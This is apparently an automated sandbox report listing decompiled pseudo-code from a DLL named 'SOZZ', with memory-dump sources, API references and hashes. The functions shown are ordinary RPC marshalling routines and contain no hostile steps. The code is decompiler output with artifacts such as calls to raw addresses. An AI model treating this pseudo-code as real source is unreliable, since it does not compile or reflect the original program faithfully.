                                                                                                				intOrPtr _v48;
                                                                                                				intOrPtr _t116;
                                                                                                				char _t125;
                                                                                                				intOrPtr _t137;
                                                                                                				intOrPtr _t140;
                                                                                                				void* _t152;
                                                                                                				void* _t216;
                                                                                                				void* _t217;
                                                                                                				void* _t218;
                                                                                                				void* _t219;
                                                                                                				void* _t220;
                                                                                                				void* _t221;
                                                                                                
                                                                                                				_v12 = _a12[1] & 0x0000ffff;
                                                                                                				_v8 = 0;
                                                                                                				_v24 = 0;
                                                                                                				_v44 = 0;
                                                                                                				_v32 = 0;
                                                                                                				_v28 = 0;
                                                                                                				_v36 = 0;
                                                                                                				_v16 = 0;
                                                                                                				0x6eda0000("(%p,%p,%p,%d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
                                                                                                				_t219 = _t218 + 0x14;
                                                                                                				_t116 = _a4;
                                                                                                				_t223 =  *((intOrPtr*)(_t116 + 0x34));
                                                                                                				if( *((intOrPtr*)(_t116 + 0x34)) == 0) {
                                                                                                					_v48 =  *((intOrPtr*)(_a4 + 0x30));
                                                                                                					_v20 =  *((intOrPtr*)(_a4 + 4));
                                                                                                					 *((intOrPtr*)(_a4 + 0x30)) = 1;
                                                                                                					E6EDA5F90(_t223, _a4, _a12);
                                                                                                					 *((intOrPtr*)(_a4 + 0x30)) = _v48;
                                                                                                					 *((intOrPtr*)(_a4 + 0x34)) =  *((intOrPtr*)(_a4 + 4));
                                                                                                					0x6eda0000("difference = 0x%x\n",  *((intOrPtr*)(_a4 + 0x34)) - _v20);
                                                                                                					_t219 = _t219 + 8;
                                                                                                					_v44 = 1;
                                                                                                					 *((intOrPtr*)(_a4 + 4)) = _v20;
                                                                                                				}
                                                                                                				E6EDA73D0(( *(_a12 + (1 << 0)) & 0x000000ff) + 1, _a4 + 4, ( *(_a12 + (1 << 0)) & 0x000000ff) + 1);
                                                                                                				_t220 = _t219 + 8;
                                                                                                				_a12 =  &(_a12[2]);
                                                                                                				if( *_a12 != 0) {
                                                                                                					_v8 = _a12 +  *_a12;
                                                                                                				}
                                                                                                				_a12 =  &(_a12[1]);
                                                                                                				if(( *_a12 & 0x0000ffff) != 0) {
                                                                                                					_v24 = _a12 + ( *_a12 & 0x0000ffff);
                                                                                                				}
                                                                                                				_a12 =  &(_a12[1]);
                                                                                                				if(_v8 != 0) {
                                                                                                					_t140 = E6EDAD650( *_v8 & 0x000000ff, _a4, _v8);
                                                                                                					_t220 = _t220 + 0xc;
                                                                                                					_v16 = _t140;
                                                                                                					_v12 = _v12 + _v16;
                                                                                                					_v28 =  *((intOrPtr*)(_a4 + 0x3c));
                                                                                                					_v32 =  *((intOrPtr*)(_a4 + 0x44));
                                                                                                					_v36 =  *((intOrPtr*)(_a4 + 0x40));
                                                                                                				}
                                                                                                				if((_a16 & 0x000000ff) == 0 &&  *_a8 == 0) {
                                                                                                					_a16 = 1;
                                                                                                				}
                                                                                                				if((_a16 & 0x000000ff) != 0) {
                                                                                                					_t137 = E6EDAA3B0(_a4, _a4, _v12);
                                                                                                					_t220 = _t220 + 8;
                                                                                                					 *_a8 = _t137;
                                                                                                				}
                                                                                                				_t125 = E6EDA9560(_a4,  *_a8, _a12, _v24, _a16 & 0x000000ff);
                                                                                                				_t221 = _t220 + 0x14;
                                                                                                				_v40 = _t125;
                                                                                                				if(_v8 != 0) {
                                                                                                					 *((intOrPtr*)(_a4 + 0x3c)) = _v28;
                                                                                                					 *((intOrPtr*)(_a4 + 0x44)) = _v32;
                                                                                                					 *((intOrPtr*)(_a4 + 0x40)) = _v36;
                                                                                                					if((_a16 & 0x000000ff) != 0) {
                                                                                                						E6EDB0770(_v40, 0, _v16);
                                                                                                						_t221 = _t221 + 0xc;
                                                                                                					}
                                                                                                					E6EDAD830(_t152, _t216, _t217,  *_v8 & 0x000000ff, _a4,  &_v40, _v8, 0, 0, 1);
                                                                                                				}
                                                                                                				if(_v44 != 0) {
                                                                                                					 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)(_a4 + 0x34));
                                                                                                					 *((intOrPtr*)(_a4 + 0x34)) = 0;
                                                                                                				}
                                                                                                				return 0;
                                                                                                			}


                                                                                                APIs
                                                                                                • _NdrComplexStructMemorySize@8.SOZZ(?,?), ref: 6EDA3B2C
                                                                                                • _memset.LIBCMT ref: 6EDA3CA9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ComplexMemorySize@8Struct_memset
                                                                                                • String ID: (%p,%p,%p,%d)$difference = 0x%x
                                                                                                • API String ID: 4515687-1755659387
                                                                                                • Opcode ID: 424731866f9ca5aa2fcd4905e701aa0e25e7ff07aaf446757c02c28646084193
                                                                                                • Instruction ID: bff2ea26c40e7e01cc88d8dc3c70c0891e731825e7bc259c4c77226aadb665ba
                                                                                                • Opcode Fuzzy Hash: 424731866f9ca5aa2fcd4905e701aa0e25e7ff07aaf446757c02c28646084193
                                                                                                • Instruction Fuzzy Hash: A5910BB4A00249EFDB44CF98C890BEEBBB5BF48304F148559F9199B341D375EA51CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 62%
                                                                                                			E6EDA3FC0(intOrPtr _a4, intOrPtr* _a8, signed char* _a12, signed int _a16) {
                                                                                                				signed int _v5;
                                                                                                				signed int _v12;
                                                                                                				signed int _v16;
                                                                                                				intOrPtr _v20;
                                                                                                				intOrPtr _v24;
                                                                                                				signed int _v28;
                                                                                                				intOrPtr _v32;
                                                                                                				intOrPtr _t96;
                                                                                                				intOrPtr _t110;
                                                                                                				void* _t171;
                                                                                                				void* _t172;
                                                                                                				void* _t175;
                                                                                                
                                                                                                				0x6eda0000("(%p, %p, %p, %d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
                                                                                                				_t172 = _t171 + 0x14;
                                                                                                				if(( *_a12 & 0x000000ff) == 0x1f || ( *_a12 & 0x000000ff) == 0x20) {
                                                                                                					_v5 = (_a12[1] & 0x000000ff) + 1;
                                                                                                					if(( *_a12 & 0x000000ff) != 0x1f) {
                                                                                                						_a12 =  &(_a12[2]);
                                                                                                						_v16 =  *_a12;
                                                                                                						_a12 =  &(_a12[4]);
                                                                                                						_v12 =  *_a12;
                                                                                                						_a12 =  &(_a12[4]);
                                                                                                					} else {
                                                                                                						_a12 =  &(_a12[2]);
                                                                                                						_v16 =  *_a12 & 0x0000ffff;
                                                                                                						_a12 =  &(_a12[2]);
                                                                                                						_v12 =  *_a12 & 0x0000ffff;
                                                                                                						_a12 =  &(_a12[2]);
                                                                                                					}
                                                                                                					_v28 =  *_a12 & 0x0000ffff;
                                                                                                					_a12 =  &(_a12[2]);
                                                                                                					_a12 = E6EDAA540(_v12, _a4, _a12, _v12);
                                                                                                					E6EDA73D0(_v5 & 0x000000ff, _a4 + 4, _v5 & 0x000000ff);
                                                                                                					_t96 = E6EDAAEC0(_v28,  *((intOrPtr*)(_a4 + 0x44)));
                                                                                                					_t175 = _t172 + 0x1c;
                                                                                                					_v20 = _t96;
                                                                                                					_v32 =  *((intOrPtr*)(_a4 + 0x40));
                                                                                                					if((_a16 & 0x000000ff) == 0 &&  *_a8 == 0) {
                                                                                                						_a16 = 1;
                                                                                                					}
                                                                                                					_t132 = _a16 & 0x000000ff;
                                                                                                					if((_a16 & 0x000000ff) != 0) {
                                                                                                						_t110 = E6EDAA3B0(_t132, _a4, _v16);
                                                                                                						_t175 = _t175 + 8;
                                                                                                						 *_a8 = _t110;
                                                                                                					}
                                                                                                					 *((intOrPtr*)(_a4 + 0x10)) =  *((intOrPtr*)(_a4 + 4));
                                                                                                					_v24 =  *((intOrPtr*)(_a4 + 0x10));
                                                                                                					E6EDAAF00(_a4, _v20);
                                                                                                					E6EDAC2B0(_a4, _v24,  *_a8, _a12, _a16 & 0x000000ff);
                                                                                                					E6EDB0120( *_a8 + _v32, _v24, _v20);
                                                                                                					return 0;
                                                                                                				} else {
                                                                                                					0x6eda0000("invalid format type %x\n",  *_a12 & 0x000000ff);
                                                                                                					__imp__RpcRaiseException(0x6e6);
                                                                                                					return 0;
                                                                                                				}
                                                                                                			}


                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise_memmove
                                                                                                • String ID: (%p, %p, %p, %d)$invalid format type %x
                                                                                                • API String ID: 4056999889-658257468
                                                                                                • Opcode ID: 91cd96b2e87b3aa135b9e31be7796a5a7b901dbb334babd7364af7e587717094
                                                                                                • Instruction ID: 6929ec0f5c5266864426566b3b906d1a7123bc7357aa5918ac26da03e7caf6f7
                                                                                                • Opcode Fuzzy Hash: 91cd96b2e87b3aa135b9e31be7796a5a7b901dbb334babd7364af7e587717094
                                                                                                • Instruction Fuzzy Hash: 556173B5A0424A9FCB04CF98C8909AF7BB6FF89304F048559F9558B345D730EA61CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDAA32D
                                                                                                • RpcRaiseException.RPCRT4(0000000E), ref: 6EDAA34A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: -- %p$overflow of adjusted_len %ld, len %ld
                                                                                                • API String ID: 3997070919-2781439172
                                                                                                • Opcode ID: 725e29cc9d2c9387e2a4d6c6aba4837f6ba7ca92af6edc31b4633b8c40b51412
                                                                                                • Instruction ID: df96f5c5b747cce2a4da692835396023981385285fc5e8cd284202f9a9d6a273
                                                                                                • Opcode Fuzzy Hash: 725e29cc9d2c9387e2a4d6c6aba4837f6ba7ca92af6edc31b4633b8c40b51412
                                                                                                • Instruction Fuzzy Hash: 663169B5A04208EFCB04CFD8C884ADEBFB5EF4A314F148698E9499B355D330AA06DF51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 37%
                                                                                                			E6EDA1910(intOrPtr _a4, signed char* _a8, signed char* _a12) {
                                                                                                				signed char _v5;
                                                                                                				signed int _v12;
                                                                                                				signed int _v16;
                                                                                                				intOrPtr _v20;
                                                                                                				signed char* _t77;
                                                                                                				signed char* _t105;
                                                                                                				signed char* _t126;
                                                                                                				intOrPtr _t130;
                                                                                                
                                                                                                				0x6eda0000("(%p, %p, %p)\n", _a4, _a8, _a12);
                                                                                                				if(( *_a12 & 0x000000ff) == 0x1f || ( *_a12 & 0x000000ff) == 0x20) {
                                                                                                					_v5 = (_a12[1] & 0x000000ff) + 1;
                                                                                                					_t126 = _a12;
                                                                                                					__eflags = ( *_t126 & 0x000000ff) - 0x1f;
                                                                                                					if(( *_t126 & 0x000000ff) != 0x1f) {
                                                                                                						_a12 =  &(_a12[2]);
                                                                                                						_a12 =  &(_a12[4]);
                                                                                                						_v12 =  *_a12;
                                                                                                						_t105 =  &(_a12[4]);
                                                                                                						__eflags = _t105;
                                                                                                						_a12 = _t105;
                                                                                                					} else {
                                                                                                						_a12 =  &(_a12[2]);
                                                                                                						_a12 =  &(_a12[2]);
                                                                                                						_v12 =  *_a12 & 0x0000ffff;
                                                                                                						_a12 =  &(_a12[2]);
                                                                                                					}
                                                                                                					_v16 =  *_a12 & 0x0000ffff;
                                                                                                					_a12 =  &(_a12[2]);
                                                                                                					_t77 = _a8;
                                                                                                					0x6eda0000(_a4, _t77, _a12, 0);
                                                                                                					_a12 = _t77;
                                                                                                					_t130 = _a4;
                                                                                                					__eflags =  *((intOrPtr*)(_t130 + 0x44)) - _v12;
                                                                                                					if( *((intOrPtr*)(_t130 + 0x44)) > _v12) {
                                                                                                						L8:
                                                                                                						__imp__RpcRaiseException(0x6c6);
                                                                                                						return 0;
                                                                                                					} else {
                                                                                                						__eflags =  *((intOrPtr*)(_a4 + 0x44)) +  *((intOrPtr*)(_a4 + 0x40)) - _v12;
                                                                                                						if(__eflags <= 0) {
                                                                                                							E6EDAA800(_a4, __eflags, _a4);
                                                                                                							E6EDA7400(_a4, _a4 + 4, _v5 & 0x000000ff);
                                                                                                							_v20 = E6EDAAEC0(_v16,  *((intOrPtr*)(_a4 + 0x44)));
                                                                                                							 *((intOrPtr*)(_a4 + 0x10)) =  *((intOrPtr*)(_a4 + 4));
                                                                                                							E6EDAB030(_a4, _a8 +  *((intOrPtr*)(_a4 + 0x40)), _v20);
                                                                                                							E6EDABFC0(_a4, _a8, _a12);
                                                                                                							__eflags = 0;
                                                                                                							return 0;
                                                                                                						}
                                                                                                						goto L8;
                                                                                                					}
                                                                                                				} else {
                                                                                                					0x6eda0000("invalid format type %x\n",  *_a12 & 0x000000ff);
                                                                                                					__imp__RpcRaiseException(0x6e6);
                                                                                                					return 0;
                                                                                                				}
                                                                                                			}












                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA1979
                                                                                                • RpcRaiseException.RPCRT4(000006C6), ref: 6EDA1A44
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p, %p, %p)$invalid format type %x
                                                                                                • API String ID: 3997070919-2648126113
                                                                                                • Opcode ID: 3751fa0a108253ed08cb372333bbd17c9dc46fa0352b2ebd89efa9d8d3405c76
                                                                                                • Instruction ID: bc00269d58b713cc0d912c53d766af25dba2ee12ece0d5699d778a55c8a58252
                                                                                                • Opcode Fuzzy Hash: 3751fa0a108253ed08cb372333bbd17c9dc46fa0352b2ebd89efa9d8d3405c76
                                                                                                • Instruction Fuzzy Hash: 485144B56002499FDB04CF9CC890AAF7BB6FF89344F148958F9558B345D731EA61CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 37%
                                                                                                			E6EDA54A0(intOrPtr _a4, signed char* _a8, signed char* _a12) {
                                                                                                				signed char _v5;
                                                                                                				signed int _v12;
                                                                                                				signed int _v16;
                                                                                                				signed char* _t68;
                                                                                                				intOrPtr _t69;
                                                                                                				signed char* _t89;
                                                                                                				signed char* _t108;
                                                                                                
                                                                                                				0x6eda0000("(%p, %p, %p)\n", _a4, _a8, _a12);
                                                                                                				if(( *_a12 & 0x000000ff) == 0x1f || ( *_a12 & 0x000000ff) == 0x20) {
                                                                                                					_v5 = (_a12[1] & 0x000000ff) + 1;
                                                                                                					_t108 = _a12;
                                                                                                					__eflags = ( *_t108 & 0x000000ff) - 0x1f;
                                                                                                					if(( *_t108 & 0x000000ff) != 0x1f) {
                                                                                                						_a12 =  &(_a12[2]);
                                                                                                						_a12 =  &(_a12[4]);
                                                                                                						_v12 =  *_a12;
                                                                                                						_t89 =  &(_a12[4]);
                                                                                                						__eflags = _t89;
                                                                                                						_a12 = _t89;
                                                                                                					} else {
                                                                                                						_a12 =  &(_a12[2]);
                                                                                                						_a12 =  &(_a12[2]);
                                                                                                						_v12 =  *_a12 & 0x0000ffff;
                                                                                                						_a12 =  &(_a12[2]);
                                                                                                					}
                                                                                                					_v16 =  *_a12 & 0x0000ffff;
                                                                                                					_a12 =  &(_a12[2]);
                                                                                                					_t68 = _a8;
                                                                                                					0x6eda0000(_a4, _t68, _a12, 0);
                                                                                                					_a12 = _t68;
                                                                                                					_t69 =  *((intOrPtr*)(_a4 + 0x44));
                                                                                                					__eflags = _t69 - _v12;
                                                                                                					if(_t69 > _v12) {
                                                                                                						L8:
                                                                                                						__imp__RpcRaiseException(0x6c6);
                                                                                                						return _t69;
                                                                                                					} else {
                                                                                                						_t69 = _a4;
                                                                                                						__eflags =  *((intOrPtr*)(_a4 + 0x44)) +  *((intOrPtr*)(_t69 + 0x40)) - _v12;
                                                                                                						if(__eflags <= 0) {
                                                                                                							E6EDAA9B0(__eflags, _a4);
                                                                                                							__eflags = _a4 + 0x14;
                                                                                                							E6EDA73B0(_a4 + 0x14, _v5 & 0x000000ff);
                                                                                                							E6EDAAF50(_a4, E6EDAAEC0(_v16,  *((intOrPtr*)(_a4 + 0x44))));
                                                                                                							return E6EDAC570(_a4, _a8, _a12);
                                                                                                						}
                                                                                                						goto L8;
                                                                                                					}
                                                                                                				} else {
                                                                                                					0x6eda0000("invalid format type %x\n",  *_a12 & 0x000000ff);
                                                                                                					__imp__RpcRaiseException(0x6e6);
                                                                                                					return 0;
                                                                                                				}
                                                                                                			}











                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA5509
                                                                                                • RpcRaiseException.RPCRT4(000006C6), ref: 6EDA55D2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p, %p, %p)$invalid format type %x
                                                                                                • API String ID: 3997070919-2648126113
                                                                                                • Opcode ID: c3930c2139d61c1ecc409777772e8b00ec686fccdfb4ce6ecc0dbf077f74de73
                                                                                                • Instruction ID: 641a6e452ca4e291a395044b38eddf96e5e4ffd12166056f46dfb70708b024c8
                                                                                                • Opcode Fuzzy Hash: c3930c2139d61c1ecc409777772e8b00ec686fccdfb4ce6ecc0dbf077f74de73
                                                                                                • Instruction Fuzzy Hash: BC5165B5A042899FDB04DF9CD890AAF7BB6FF85304F048558FA558B345D731EA60CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 37%
                                                                                                			E6EDA5640(int _a4, WCHAR* _a8, signed char* _a12) {
                                                                                                				intOrPtr _v8;
                                                                                                				intOrPtr _v12;
                                                                                                				intOrPtr _v16;
                                                                                                				intOrPtr _v20;
                                                                                                				intOrPtr _v24;
                                                                                                				intOrPtr _v28;
                                                                                                				void* _t72;
                                                                                                				intOrPtr _t73;
                                                                                                				signed char* _t85;
                                                                                                
                                                                                                				_v8 = 0;
                                                                                                				0x6eda0000("(%p,%p,%p)\n", _a4, _a8, _a12);
                                                                                                				if(( *_a12 & 0x000000ff) != 0x21) {
                                                                                                					_t85 = _a12;
                                                                                                					0x6eda0000("invalid format type %x\n",  *_t85 & 0x000000ff);
                                                                                                					__imp__RpcRaiseException(0x6e6);
                                                                                                					return _t85;
                                                                                                				}
                                                                                                				if( *((intOrPtr*)(_a4 + 0x30)) == 0 &&  *((intOrPtr*)(_a4 + 0x6c)) == 0) {
                                                                                                					_v12 =  *((intOrPtr*)(_a4 + 0x30));
                                                                                                					_v28 =  *((intOrPtr*)(_a4 + 0x14));
                                                                                                					_v24 =  *((intOrPtr*)(_a4 + 0x3c));
                                                                                                					_v20 =  *((intOrPtr*)(_a4 + 0x40));
                                                                                                					_v16 =  *((intOrPtr*)(_a4 + 0x44));
                                                                                                					 *((intOrPtr*)(_a4 + 0x30)) = 1;
                                                                                                					E6EDA5640(_a4, _a8, _a12);
                                                                                                					 *((intOrPtr*)(_a4 + 0x30)) = _v12;
                                                                                                					 *((intOrPtr*)(_a4 + 0x6c)) =  *((intOrPtr*)(_a4 + 0x14));
                                                                                                					_v8 = 1;
                                                                                                					 *((intOrPtr*)(_a4 + 0x44)) = _v16;
                                                                                                					 *((intOrPtr*)(_a4 + 0x40)) = _v20;
                                                                                                					 *((intOrPtr*)(_a4 + 0x3c)) = _v24;
                                                                                                					 *((intOrPtr*)(_a4 + 0x14)) = _v28;
                                                                                                				}
                                                                                                				E6EDACC40(0x21, _a4, _a8, _a12);
                                                                                                				_t72 = E6EDACE70(0x21, _a4, _a8, _a12, 1);
                                                                                                				if(_v8 != 0) {
                                                                                                					_t73 =  *((intOrPtr*)(_a4 + 0x6c));
                                                                                                					 *((intOrPtr*)(_a4 + 0x14)) = _t73;
                                                                                                					 *((intOrPtr*)(_a4 + 0x6c)) = 0;
                                                                                                					return _t73;
                                                                                                				}
                                                                                                				return _t72;
                                                                                                			}













                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA569C
                                                                                                • _NdrComplexArrayBufferSize@12.SOZZ(00000001,?,?), ref: 6EDA5704
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ArrayBufferComplexExceptionRaiseSize@12
                                                                                                • String ID: (%p,%p,%p)$invalid format type %x
                                                                                                • API String ID: 1767167962-814374321
                                                                                                • Opcode ID: 0660094ba33daa652cd649061ab76c37942151a11502ccb336915c79f38b49cf
                                                                                                • Instruction ID: 68d7acb66765dce48d51bc43a854207ed24360ebb714fff6e6195ecf54dcb66a
                                                                                                • Opcode Fuzzy Hash: 0660094ba33daa652cd649061ab76c37942151a11502ccb336915c79f38b49cf
                                                                                                • Instruction Fuzzy Hash: 7541C7B9A00209EFDB44CF88D490AAA7BB5FF88354F108159FD488B341D771EA81CFA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 53%
                                                                                                			E6EDA4580(void* __eflags, signed int _a4, signed int* _a8, signed short* _a12, signed int _a16) {
                                                                                                				signed int _v5;
                                                                                                				signed char _v6;
                                                                                                				signed int _v12;
                                                                                                				intOrPtr _v16;
                                                                                                				char _v20;
                                                                                                				signed int _t54;
                                                                                                				void* _t94;
                                                                                                				void* _t98;
                                                                                                
                                                                                                				0x6eda0000("(%p, %p, %p, %d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
                                                                                                				_a12 =  &(_a12[0]);
                                                                                                				_v6 =  *_a12 & 0xf;
                                                                                                				_v5 = ( *_a12 & 0xf0) >> 4;
                                                                                                				_a12 =  &(_a12[0]);
                                                                                                				E6EDA73D0(_v5 & 0x000000ff, _a4 + 4, _v5 & 0x000000ff);
                                                                                                				_v16 = E6EDAE930( *((intOrPtr*)(_a4 + 4)), _v6 & 0x000000ff,  *((intOrPtr*)(_a4 + 4)));
                                                                                                				0x6eda0000("got switch value 0x%x\n", _v16);
                                                                                                				_t98 = _t94 + 0x2c;
                                                                                                				_v12 = ( *_a12 & 0x0000ffff) + (_v5 & 0x000000ff);
                                                                                                				if((_a16 & 0x000000ff) == 0 &&  *_a8 == 0) {
                                                                                                					_a16 = 1;
                                                                                                				}
                                                                                                				_t54 = _a16 & 0x000000ff;
                                                                                                				if(_t54 != 0) {
                                                                                                					__imp__NdrAllocate(_a4, _v12 & 0x0000ffff);
                                                                                                					 *_a8 = _t54;
                                                                                                				}
                                                                                                				if((_a16 & 0x000000ff) != 0) {
                                                                                                					E6EDB0770( *_a8, 0, _v12 & 0x0000ffff);
                                                                                                					_t98 = _t98 + 0xc;
                                                                                                				}
                                                                                                				E6EDA77F0(_a4, _a8,  &_v6, 0);
                                                                                                				_v20 = (_v5 & 0x000000ff) +  *_a8;
                                                                                                				return E6EDAED20(_a4,  &_v20, _v16, _a12, 0);
                                                                                                			}












                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: Allocate_memset
                                                                                                • String ID: (%p, %p, %p, %d)$got switch value 0x%x
                                                                                                • API String ID: 3995017260-3216196450
                                                                                                • Opcode ID: 312c67792c18e7ddb0f5c715fc4a7d996c3dac884090ec89b1d6dba25308c205
                                                                                                • Instruction ID: 565637d6e60c83fdefc2c45eab52fdd8cc17a24525483a424c873687dc7323e7
                                                                                                • Opcode Fuzzy Hash: 312c67792c18e7ddb0f5c715fc4a7d996c3dac884090ec89b1d6dba25308c205
                                                                                                • Instruction Fuzzy Hash: 794182B5904289ABCB04CFA8D850AFF7BB9AF49205F048588FD559B382D735D610DB71
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA6E97
                                                                                                • RpcRaiseException.RPCRT4(000006C6), ref: 6EDA6F42
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p, %p, %p)$invalid format type %x
                                                                                                • API String ID: 3997070919-2648126113
                                                                                                • Opcode ID: 4edacebb3cf9910459c63f48bd5b673020c5bddccac23e2c79045103bf9e74fe
                                                                                                • Instruction ID: b1ee208114508d5c5f3fbc4675fafc8d2f7a74a8943e0035acc9243219c3ecce
                                                                                                • Opcode Fuzzy Hash: 4edacebb3cf9910459c63f48bd5b673020c5bddccac23e2c79045103bf9e74fe
                                                                                                • Instruction Fuzzy Hash: 8F413EB160424ADFDB08CF9CC890AAF77A6FF85304F148559FA658B345D731EA60CB94
                                                                                                Uniqueness

